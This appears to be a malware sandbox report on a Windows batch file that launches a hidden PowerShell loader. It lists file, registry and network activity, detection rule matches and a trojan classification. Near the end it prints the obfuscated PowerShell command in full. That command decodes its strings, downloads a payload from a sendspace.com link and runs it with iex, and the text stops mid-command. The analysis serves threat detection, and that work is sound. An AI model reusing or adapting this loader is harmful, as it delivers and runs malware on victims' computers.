Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: |
Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: Qib.pdb[ source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD96000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbL source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: *on.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: Joe Sandbox View |
IP Address: 172.67.170.105 172.67.170.105 |
Source: Joe Sandbox View |
IP Address: 69.31.136.53 69.31.136.53 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ogm6qc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ogm6qc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs12n5.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67E1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs12n5.sendspace.com |
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs12n5.sendspaX |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs12n5.sendspace.com |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E91000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A5DDC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A62C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E3B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ogm6qcP |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: amsi64_5256.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 6192 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 6192 |
Jump to behavior |
Source: amsi64_5256.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: classification engine |
Classification label: mal84.troj.evad.winCMD@7/6@3/2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Roaming\Tchick.Ite |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tc2pmvdp.lku.ps1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesRecko |